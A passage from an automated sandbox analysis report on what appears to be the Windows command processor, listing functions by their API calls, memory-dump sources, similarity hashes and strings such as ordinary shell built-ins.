                                                                            • SetConsoleMode.KERNELBASE(00000000), ref: 00B0E39A
                                                                            • _get_osfhandle.MSVCRT ref: 00B0E3C7
                                                                            • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00B0E3D1
                                                                            • _get_osfhandle.MSVCRT ref: 00B1DC35
                                                                            • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00B1DC3F
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: ConsoleMode_get_osfhandle
                                                                            • String ID: CMD.EXE
                                                                            • API String ID: 1606018815-3025314500
                                                                            • Opcode ID: e2208a7aab44e9d8cb7020cba94710cb6b0a1627705afc31fab32c94ac85b560
                                                                            • Instruction ID: d5d56c49f5576df360143ca3a7097fcb0b9a456785ca8d947058f7f5aaa9f334
                                                                            • Opcode Fuzzy Hash: e2208a7aab44e9d8cb7020cba94710cb6b0a1627705afc31fab32c94ac85b560
                                                                            • Instruction Fuzzy Hash: 6121A1B66402009FE7154B38EC1EB2A3E54FB01755B044829F512C33F0DFB6DA058B57

                                                                            Control-flow Graph (graph image not reproduced)

                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B05A10
                                                                            • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,-00000001), ref: 00B05A53
                                                                            • CreateDirectoryW.KERNELBASE(?,00000000), ref: 00B05A70
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00B05A87
                                                                              • Part of subcall function 00B10B12: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00B10B40
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00B05AA1
                                                                            • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 00B05B09
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00B05B13
                                                                            • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 00B05B70
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00B19B7C
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectoryErrorLast$DriveFullNamePathTypememset
                                                                            • String ID:
                                                                            • API String ID: 402963468-0
                                                                            • Opcode ID: 237e3ac5e895e1b50c03e24a336b39ef8f483db33c6d38d0b21decf7f009fc12
                                                                            • Instruction ID: 9955b104f8cdba01e418f4341a9dd97d0d84e2de0aeccd506ab645a582acb26d
                                                                            • Opcode Fuzzy Hash: 237e3ac5e895e1b50c03e24a336b39ef8f483db33c6d38d0b21decf7f009fc12
                                                                            • Instruction Fuzzy Hash: D791C031A006469AEB34DF659C95ABBBBF4FF89310F5440E9E50AE75C0EB709E84CB50

                                                                            Control-flow Graph (graph image not reproduced)

                                                                            APIs
                                                                            • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(000003E8,00B2CA98,0000000C), ref: 00B16940
                                                                            • _amsg_exit.MSVCRT ref: 00B16955
                                                                            • _initterm.MSVCRT ref: 00B169A9
                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00B169D5
                                                                            • exit.MSVCRT ref: 00B16A1C
                                                                            • _XcptFilter.MSVCRT ref: 00B16A2E
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentFilterImageNonwritableSleepXcpt_amsg_exit_inittermexit
                                                                            • String ID:
                                                                            • API String ID: 796493780-0
                                                                            • Opcode ID: 3d771c3d5d3b3a30f10b3fd0e61b85a49303dc15257259b11007c45dff53fadf
                                                                            • Instruction ID: db97027c54607d87838a133f7ff74a205a63ac2d7cac37638b56d858e8f5395f
                                                                            • Opcode Fuzzy Hash: 3d771c3d5d3b3a30f10b3fd0e61b85a49303dc15257259b11007c45dff53fadf
                                                                            • Instruction Fuzzy Hash: CB31E176544211CFEB359F56EC456A93BE0EB48765FA000A9E515A72E0EF70D881CB41

                                                                            Control-flow Graph (graph image not reproduced)

                                                                            APIs
                                                                            • SetThreadUILanguage.KERNELBASE ref: 00B0E2C6
                                                                            • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL,00000000,00B0B952), ref: 00B0E2D9
                                                                            • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(74DD0000,SetThreadUILanguage,00000000,00B0B952), ref: 00B0E2F9
                                                                            • SetThreadLocale.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000409,00000000,00B0B952), ref: 00B1DC08
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$AddressHandleLanguageLocaleModuleProc
                                                                            • String ID: KERNEL32.DLL$SetThreadUILanguage
                                                                            • API String ID: 1264603166-2530943252
                                                                            • Opcode ID: be28ef8e9dbd4624b1c984de38b608a1d95aee5c0e1b135a79d3674be0bcb916
                                                                            • Instruction ID: 590435d24ece86b04382eee02421fcd5201071306ab8cc62bdb0c09dcded826a
                                                                            • Opcode Fuzzy Hash: be28ef8e9dbd4624b1c984de38b608a1d95aee5c0e1b135a79d3674be0bcb916
                                                                            • Instruction Fuzzy Hash: F3F03A35A402209BCA215B24BD4D65A3F94FB06B71B250B86FD25E32E0CB70EC468AE5

                                                                            Control-flow Graph (graph image not reproduced)

                                                                            APIs
                                                                            • GetConsoleTitleW.KERNELBASE(?,00000104,F330BDDA,00000001,?), ref: 00B0ADB6
                                                                              • Part of subcall function 00B15A2E: memset.MSVCRT ref: 00B15A5A
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                            • towupper.MSVCRT ref: 00B0B0E3
                                                                              • Part of subcall function 00B0E950: memset.MSVCRT ref: 00B0E9A0
                                                                              • Part of subcall function 00B0E950: wcschr.MSVCRT ref: 00B0E9FC
                                                                              • Part of subcall function 00B0E950: wcschr.MSVCRT ref: 00B0EA14
                                                                              • Part of subcall function 00B0E950: _wcsicmp.MSVCRT ref: 00B0EA80
                                                                            • wcschr.MSVCRT ref: 00B0AED2
                                                                            • wcsncmp.MSVCRT ref: 00B0B016
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BCA7
                                                                              • Part of subcall function 00B0BC30: iswspace.MSVCRT ref: 00B0BD1D
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BD39
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BD5D
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00007FE7), ref: 00B1CC6C
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00B1CCCB
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: wcschr$memset$ErrorLast$ConsoleTitle_wcsicmpiswspacetowupperwcsncmp
                                                                            • String ID:
                                                                            • API String ID: 4198873954-0
                                                                            • Opcode ID: 092302c6b122b34e9e39db7c6503134fe4b5ba9e80691f5a221f5ef8d3490531
                                                                            • Instruction ID: 496de814930d71132970f3def9a9953790c24e0b392b3e9111d72e93ff8e7396
                                                                            • Opcode Fuzzy Hash: 092302c6b122b34e9e39db7c6503134fe4b5ba9e80691f5a221f5ef8d3490531
                                                                            • Instruction Fuzzy Hash: 56B12971A003128BCB24AB28CC95BBA7BE0EF40700F5449E9D90AE72D1EF709D85C7D6

                                                                            Control-flow Graph (rendered image, executed and not-executed blocks colour-coded): 15 basic blocks starting at 00B11F1A. The entry block (b11f1a-b11f33) calls GetConsoleOutputCP and GetCPInfo and branches either to b1f185 (GetThreadLocale) or to b11f39 (memset); a loop through b1f1dd, b1f1e4 and b1f203 wraps a second memset at b1f1ee-b1f200 before the function exits at b1f20b.
                                                                            APIs
                                                                            • GetConsoleOutputCP.KERNELBASE(00B10A41), ref: 00B11F1A
                                                                            • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00B3C9F0), ref: 00B11F2B
                                                                            • memset.MSVCRT ref: 00B11F45
                                                                            • GetThreadLocale.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00B1F185
                                                                            • memset.MSVCRT ref: 00B1F1FB
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            Similarity
                                                                            • API ID: memset$ConsoleInfoLocaleOutputThread
                                                                            • String ID:
                                                                            • API String ID: 1263632223-0
                                                                            • Opcode ID: 3e82084c6c9b5f9336f9582504a3a66986919f668ad86a73911ee26795499a01
                                                                            • Instruction ID: 5c7f419e3cf63b42d08ad01bb742537b353c0742c67990ab0d82bf2b473fd2a9
                                                                            • Opcode Fuzzy Hash: 3e82084c6c9b5f9336f9582504a3a66986919f668ad86a73911ee26795499a01
                                                                            • Instruction Fuzzy Hash: D31129B5858343A9D7225F94DC4A7F93BE4E701301FD502F6E98177194EBA445C2C356

                                                                            Control-flow Graph (rendered image, executed and not-executed blocks colour-coded): 11 basic blocks starting at 00B0E3F0. The entry block calls b16e25 and then either takes the b1dc4a-b1dc66 path (call b234d4, the block that references the onecore\base\cmd\maxpathawarestring.cpp string) or continues at b0e42d, from which it reaches the vector delete operator ??_V@YAXPAX@Z at b1dc6b or the memset at b0e451-b0e45a before returning via b0e45d-b0e463.
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B0E455
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,00B05F21,-00000001), ref: 00B1DC6C
                                                                            Strings
                                                                            • onecore\base\cmd\maxpathawarestring.cpp, xrefs: 00B1DC57
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            Similarity
                                                                            • API ID: memset
                                                                            • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                                            • API String ID: 2221118986-3416068913
                                                                            • Opcode ID: 02dcc5dfa77ef786a2e423f5ca04801161f0142e842871a747b5b96ddc1a2d3f
                                                                            • Instruction ID: 746b630debb8955a33db3989337e89a10121edd0a4dd8500793b23e1ba5c3b6c
                                                                            • Opcode Fuzzy Hash: 02dcc5dfa77ef786a2e423f5ca04801161f0142e842871a747b5b96ddc1a2d3f
                                                                            • Instruction Fuzzy Hash: CE014CB2740304ABD7285724DC4AB6FBBD9DBD0310F1049ADF82AD73D1DEA5EC8082A1
                                                                            APIs
                                                                            • _callnewh.MSVCRT ref: 00B17437
                                                                              • Part of subcall function 00B174D1: ??0exception@@QAE@ABQBDH@Z.MSVCRT(00B177EC,00000001), ref: 00B174E7
                                                                            • malloc.MSVCRT ref: 00B17444
                                                                            • _CxxThrowException.MSVCRT(?,00B2CBF8), ref: 00B177F5
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            Similarity
                                                                            • API ID: ??0exception@@ExceptionThrow_callnewhmalloc
                                                                            • String ID:
                                                                            • API String ID: 813871643-0
                                                                            • Opcode ID: ecd134d0703e911ac0725b13b26ecaff0a7d9ebb41946ba102098d14fc723a3b
                                                                            • Instruction ID: a775f62a7d018eaac71eee10d52f38081ab08da51aa02eb730bce90ac627611a
                                                                            • Opcode Fuzzy Hash: ecd134d0703e911ac0725b13b26ecaff0a7d9ebb41946ba102098d14fc723a3b
                                                                            • Instruction Fuzzy Hash: 5AE0923948811D678F106665EC59CDD3FFC9B41320BA440E0B81997691DF20DA81C1D1
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B05EFB
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                              • Part of subcall function 00B08E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00B48BF0,00000000,?), ref: 00B08EC3
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BCA7
                                                                              • Part of subcall function 00B0BC30: iswspace.MSVCRT ref: 00B0BD1D
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BD39
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BD5D
                                                                              • Part of subcall function 00B10060: wcschr.MSVCRT ref: 00B1006C
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00B05FF7
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            Similarity
                                                                            • API ID: wcschr$memset$CurrentDirectoryiswspace
                                                                            • String ID:
                                                                            • API String ID: 4234405029-0
                                                                            • Opcode ID: bc7596e2dbf266fafa588001e9af3b79118516b2b958012aade6a9eb5409fbf6
                                                                            • Instruction ID: a53148ddf52b839421921c07a8088c15c55ea12978a22bd24a57ceae937ea01c
                                                                            • Opcode Fuzzy Hash: bc7596e2dbf266fafa588001e9af3b79118516b2b958012aade6a9eb5409fbf6
                                                                            • Instruction Fuzzy Hash: 47A1B0716083819BD724DB20C8596BFBBE5EF84340F5488ADF88AC7290EF74D985CB52
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            Similarity
                                                                            • API ID: memset
                                                                            • String ID: COMSPEC
                                                                            • API String ID: 2221118986-1631433037
                                                                            • Opcode ID: c482470fd2a0810456fe953e43e2af5dbe27c68c2f285d30a71230d83516d99a
                                                                            • Instruction ID: cfdb2dc1dc151a8353ced439f053cd31594c916f77c41f407ef9d1745dcd89ae
                                                                            • Opcode Fuzzy Hash: c482470fd2a0810456fe953e43e2af5dbe27c68c2f285d30a71230d83516d99a
                                                                            • Instruction Fuzzy Hash: 1741F3717046008BDB34AB28999572E7EC5DBA0708F140DEAF972872D1FE61EC848293
                                                                            APIs
                                                                            • __EH_prolog3_catch.LIBCMT ref: 00B16E37
                                                                              • Part of subcall function 00B1742D: malloc.MSVCRT ref: 00B17444
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            Similarity
                                                                            • API ID: H_prolog3_catchmalloc
                                                                            • String ID:
                                                                            • API String ID: 125873668-0
                                                                            • Opcode ID: 48d7fb9f5d636b4b1754492dafadabc294da77beafda9db2091cb403d3e8b5e6
                                                                            • Instruction ID: 42f3ee6da877fa7a825783faeb6844bd1faf7dc3d8f868623e2835437367ba1c
                                                                            • Opcode Fuzzy Hash: 48d7fb9f5d636b4b1754492dafadabc294da77beafda9db2091cb403d3e8b5e6
                                                                            • Instruction Fuzzy Hash: BFC08C2A1A8104D6CB013790E002BDC2AF0BB02B02FD080C4B0801F085DE7046D52A91
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            Similarity
                                                                            • API ID: memset
                                                                            • String ID:
                                                                            • API String ID: 2221118986-0
                                                                            • Opcode ID: dd042cd82db2749d773011737cfdba250cd93b47defd5e9e625dbbce476ced81
                                                                            • Instruction ID: 7c1f5b426dd88b73e6052a2c6584f1316078c294fe19d094b37ee02bc597e096
                                                                            • Opcode Fuzzy Hash: dd042cd82db2749d773011737cfdba250cd93b47defd5e9e625dbbce476ced81
                                                                            • Instruction Fuzzy Hash: CEE0267774A2212BE22C15A86C8BF978FDDCBC0B70F2D01BAF6049B1C0E9904D0402A4
                                                                            APIs
                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,00000000,00000001), ref: 00B241B9
                                                                            • _get_osfhandle.MSVCRT ref: 00B241CA
                                                                            • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?), ref: 00B24205
                                                                            • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04), ref: 00B2426C
                                                                            • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00B29E02,?,00000010), ref: 00B24283
                                                                            • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04), ref: 00B24292
                                                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00B242B1
                                                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00B242C4
                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 00B242D2
                                                                            • RtlFreeHeap.NTDLL ref: 00B242D9
                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 00B2432F
                                                                            • RtlFreeHeap.NTDLL ref: 00B24336
                                                                            • _wcsnicmp.MSVCRT ref: 00B243DB
                                                                            • _wcsnicmp.MSVCRT ref: 00B243F0
                                                                            • _wcsnicmp.MSVCRT ref: 00B24405
                                                                            • _wcsnicmp.MSVCRT ref: 00B2441A
                                                                            • _wcsnicmp.MSVCRT ref: 00B2442F
                                                                            • _wcsnicmp.MSVCRT ref: 00B24444
                                                                            • _wcsnicmp.MSVCRT ref: 00B24459
                                                                            • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,00000001,?), ref: 00B244A5
                                                                            • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?), ref: 00B244F0
                                                                            • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,00000020,?,?,?), ref: 00B24506
                                                                            • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000), ref: 00B2451D
                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 00B24565
                                                                            • RtlFreeHeap.NTDLL ref: 00B2456C
                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,00000001), ref: 00B24595
                                                                            • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00B2459C
                                                                            • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04), ref: 00B245C3
                                                                            • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00B29E02,?,00000000), ref: 00B245D4
                                                                            • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04), ref: 00B245DD
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferCriticalInfoReadReleaseScreenSection$AllocCharacterCursorEnterFillHandleLeaveOutputPositionWrite_get_osfhandle
                                                                            • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                                                            • API String ID: 2991647268-3100821235
                                                                            • Opcode ID: dd56136d517be993f58909426e3007775f461912bd5b3d34db28623b25a8c45b
                                                                            • Instruction ID: 2b3f2bfd9814bfc9f8a5870eb358e0eeb8c5a1c08cd5c5022393d209e4f93173
                                                                            • Opcode Fuzzy Hash: dd56136d517be993f58909426e3007775f461912bd5b3d34db28623b25a8c45b
                                                                            • Instruction Fuzzy Hash: F4C1DD35604311AFD720AF64EC89A2FBBE5FB89714F04496CF95AC36A0DB71CA45CB12
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: [...]$ [..]$ [.]$...$:
                                                                            • API String ID: 0-1980097535
                                                                            • Opcode ID: e4c3c85fb088ed8c4d750c6d37b6d94f2ef017a205041ff53cf9c1308709af90
                                                                            • Instruction ID: 67729fb58817ddc91c8edbd55e75319e5859c1b1a554a22880516a4eaa01db44
                                                                            • Opcode Fuzzy Hash: e4c3c85fb088ed8c4d750c6d37b6d94f2ef017a205041ff53cf9c1308709af90
                                                                            • Instruction Fuzzy Hash: 06129EB02083419BD725DB24D885AAFBBE9FF88340F4049ADF589C7291EF34D985CB52
                                                                            APIs
                                                                            • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00B2E590,?,00002000), ref: 00B06896
                                                                            • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00B068AA
                                                                            • FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 00B068BE
                                                                            • FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00B068D2
                                                                            • realloc.MSVCRT ref: 00B1A5E7
                                                                              • Part of subcall function 00B08791: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00B06906,0000001F,?,00000080), ref: 00B08791
                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001F,?,00000080), ref: 00B06907
                                                                            • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?), ref: 00B0698F
                                                                            • memmove.MSVCRT(?,?,?), ref: 00B06A86
                                                                            • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000000), ref: 00B06AAF
                                                                            • realloc.MSVCRT ref: 00B06ACA
                                                                            • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000001), ref: 00B06AFE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Time$File$DateFormatSystem$realloc$DefaultInfoLocalLocaleUsermemmove
                                                                            • String ID: %02d%s%02d%s%02d$%s $%s %s
                                                                            • API String ID: 2927284792-4023967598
                                                                            • Opcode ID: 0cbff3dfee767de93bc151565254911f5ce82d74a0d215a1f15011eff3d8e42f
                                                                            • Instruction ID: 0ebcb6e92d083db986efea75ffd9233b8741d42027e4967f88d920dc3ca8c370
                                                                            • Opcode Fuzzy Hash: 0cbff3dfee767de93bc151565254911f5ce82d74a0d215a1f15011eff3d8e42f
                                                                            • Instruction Fuzzy Hash: 9AC1D871A01225DFDB24DF64CC49AEF77F9EB49300F5440E9E909E7290EA31AE85CB51
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B14F03
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                            • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,-00000001), ref: 00B14F67
                                                                            • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000001), ref: 00B14F77
                                                                            • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00B02670,?,?,?,-00000001), ref: 00B14FEB
                                                                            • FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,-00000001), ref: 00B15103
                                                                            • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,-00000001), ref: 00B1511E
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,-00000001), ref: 00B15141
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$CloseFirstmemset$Next
                                                                            • String ID: \\?\
                                                                            • API String ID: 3059144641-4282027825
                                                                            • Opcode ID: d359f3120f24e7016bd6f7931f636282b70b91bd146a9264bd94f702b44de939
                                                                            • Instruction ID: f5612cbed2fe06c62e54c50297733eba31b7781025e1f9d8b18c580b232d77c5
                                                                            • Opcode Fuzzy Hash: d359f3120f24e7016bd6f7931f636282b70b91bd146a9264bd94f702b44de939
                                                                            • Instruction Fuzzy Hash: F9E19171A00115DBDB34EBA4DC89BFA77F9EB54304F9404E9E909A7282EB319E85CB50
                                                                            APIs
                                                                            • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000002), ref: 00B0539C
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
